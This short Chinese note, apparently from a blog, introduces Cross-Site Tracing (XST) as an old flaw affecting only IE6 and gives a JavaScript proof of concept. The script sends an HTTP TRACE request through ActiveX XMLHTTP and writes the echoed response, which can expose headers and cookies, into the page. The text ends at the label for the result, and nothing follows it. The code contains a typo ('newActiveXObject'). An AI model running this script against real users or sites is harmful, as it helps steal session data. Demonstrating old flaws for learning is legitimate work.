XST是一个老的漏洞,只对IE6有用。具体介绍参见:http://blog.csdn.net/yu422560654/article/details/7801030
代码:
<script type="text/javascript">
if ( navigator.appName.indexOf("Microsoft")!=-1)//判断appName中是否包含Microsoft
{
var xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
xmlHttp.open("TRACE","./", false);
xmlHttp.send();str1=xmlHttp.responseText;
while(str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");//替换
document.write(str1);
}
</script>
效果: